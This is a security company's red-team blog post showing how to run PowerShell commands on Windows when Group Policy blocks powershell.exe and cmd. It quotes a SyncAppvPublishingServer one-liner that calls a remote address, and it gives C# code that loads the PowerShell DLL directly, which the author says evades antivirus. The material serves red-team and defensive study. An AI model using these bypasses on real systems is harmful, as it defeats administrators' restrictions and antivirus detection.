Rewterz Threat Advisory – CVE-2022-3155 – Mozilla Thunderbird Vulnerability
September 23, 2022Rewterz Threat Alert – STOP/DJVU Ransomware – Active IOCs
September 23, 2022
This blog has been written by our Senior Security Researcher, S. Nayani
Introduction
Red teamers are continuously challenging protocols, policies, plans, and procedures. Thinking like an attacker and developing new techniques for infiltration comes with the job description. And this inadvertently also secures the environment.
While developing techniques for red teaming we thought about an environment where there is no PowerShell or cmd available. During a discussion with a colleague, we wanted to explore a way in which this could be done. Here’s what I came up with.
It has always intrigued me how we can perform red teaming in an environment where there’s no PowerShell or cmd available. During a discussion with other pentesters, we wanted to explore a way in which this could be done. Here’s what I came up with:
First things first let’s disable PowerShell as well as cmd:
Go to the start button and type edit group policy
Then go to User configuration -> Administrative Templates -> System -> Prevent Access to the Command prompt
And for Powershell:
User configuration -> Administrative Templates -> System -> Don’t run specified Windows applications and add powershell.exe
Let’s verify whether cmd and Powershell are restricted or not:
Work Around From The Internet
We started working on a solution and we found a few different ways to do this, which are mentioned below:
Using Powershdll:
https://github.com/p3nt4/PowerShdll
Using SyncAppvPublishingServer:
SyncAppvPublishingServer.vbs "echo ''; iwr http://192.168.11.21:4446"
There are a few more programs that can help in using PowerShell without powershell.exe, I won’t go over all the programs, here is a really awesome blog covering a few of the programs:
My Own Solution
There were two problems with the above programs, first was that most of the programs mentioned above were being caught by the AntiVirus and in an enterprise environment that could cost you the whole activity, the second was that I was not actually satisfied, I wanted something different, something other than this. I wanted to build my own solution, so I started researching PowerShell and how it actually initializes. I came across this Microsoft documentation and it had the answer for me.
The System.Management.Automation.dll has the PowerShell class and anyone can initialize the PowerShell class directly from the DLL and execute commands using any programming language. I decided to test this out using C#. Using visual studio code, I will demonstrate a simple program that will execute the PowerShell command even when Local Group Policy restricts it.
I wrote a small program that will execute whoami and hostname commands:
using System;
using System.Management.Automation;
using System.Collections.ObjectModel;
namespace Testing
{
class Program
{
static void Main(string[] args)
{
PowerShell ps = PowerShell.Create();
string command;
Collection<PSObject> PSOutput;
command = "whoami; hostname";
PSOutput = ps.AddScript(command).Invoke();
for (int i=0; i<PSOutput.Count; i++)
{
Console.WriteLine(PSOutput[i].ToString());
}
Console.ReadLine();
}
}
}
What the above program is doing is that it first initializes Powershell, and I have hard-coded the command which is “whoami” and “hostname,” after that it will Invoke the command and save it in the PSOutput array and the for loop will display the array values. Compile the program with csc.exe and execute the program:
csc.exe /reference:"C:\Program Files (x86)\Reference Assemblies\Microsoft\WindowsPowerShell\3.0\System.Management.Automation.dll" powershell.cs /out:test.exe
After compiling we will have the exe file, executing the exe file will give us the command output:
And there we have it, we executed a PowerShell command without PowerShell and thus bypassed the Local Group Policy. There are a lot of different techniques that could also be used, for example, we can rename powershell.exe to something else and it will run, or you can simply use a C2 agent to execute the commands.
From the programs mentioned earlier, some of them were detected by the AV, as far as this solution is concerned. I have scanned this program and at the time of writing, it was not detected by the AV products. This solution is also applicable to the Active Directory environment (Domain Group Policy).
We can tweak the code a little to take inputs and execute the commands:
using System;
using System.Management.Automation;
using System.Collections.ObjectModel;
namespace Testing
{
class Program
{
static void Main(string[] args)
{
PowerShell ps = PowerShell.Create();
string command;
Collection<PSObject> PSOutput;
while (true)
{
command = Console.ReadLine();
PSOutput = ps.AddScript(command).Invoke();
if (command == "exit")
{
break;
}
for (int i=0; i<PSOutput.Count; i++)
{
Console.WriteLine(PSOutput[i].ToString());
}
}
Console.ReadLine();
}
}
}
It’s a very simple and dirty solution but it can get the job done.